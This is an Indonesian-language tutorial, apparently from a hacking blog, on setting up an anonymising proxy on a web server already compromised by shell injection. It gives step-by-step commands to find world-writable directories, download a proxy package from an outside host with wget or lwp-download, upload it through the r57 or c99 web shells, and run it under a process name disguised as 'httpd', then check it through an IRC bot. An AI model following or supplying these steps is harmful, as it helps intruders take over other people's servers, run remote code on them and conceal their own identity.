Mungkin kita sudah tidak asing lagi dengan yang nama nya proxy…. Kalo saya definisikan proxy adalah sebuah mirror yang penggunaannya ditujukan untuk sebuah private yang berguna untuk menyamarkan ip address kita. Kali ini akan dijelaskan sedikit cara membuat proxy melalui shell dari sebuah web hasil injectkan.
Aku anggap kamu sudah bisa inject shell and let’s go to begin..
* masuk ke shell yang kita inject
* cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d” jika ga ada, langsung aja menuju direktori /tmp
* wget file proxynya . commandnya “wget url/file” contoh: “wget http://3xploit.110mb.com/proxy.tgz” jika ga berhasil, coba pake command lwp-download atau fetch tapi dengan url yang lengkap, contoh commandnya “lwp-download http://3xploit.110mb.com/proxy.tgz”
* kalo tidak bisa juga, pakailah script injectkan r57 ato c99 sehingga ada fitur untuk uploadnya. dan uploadlah file proxy.tgz dengan fitur tersebut. jika belum punya filenya, donlot saja secara manual di http://3xploit.110mb.com/proxy.tgz dan kemudian di upload.
* extract filenya dengan command “tar -zxvf proxy.tgz”
* setelah diextract, masuk ke direktori pro dengan command “cd pro”
* eksekusi file xh, commandnya adalah “ ./xh -s ./httpd ./prox -a -d -p5050”
* cek hidup atau tidaknya proxy kamu di IRC channel yang terdapat bot untuk cek ip. contohnya adalah #kill-9 @irc.indonesiancoder.us
* command untuk ceknya biasanya bervariasi. tapi kurang lebih seperti ini “.port ip 5050” contohnya”.port 122.168.9.70 5050”
Ket:
* Deafult port diatas adalah 5050 dan dapat di edit pada sesuai keinginan kita pada “menu.conf”
* Ini adalah tutor untuk pembuatan proxy pada web hasil inject
* Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
* Semua command di atas tanpa tanda petik dua (”)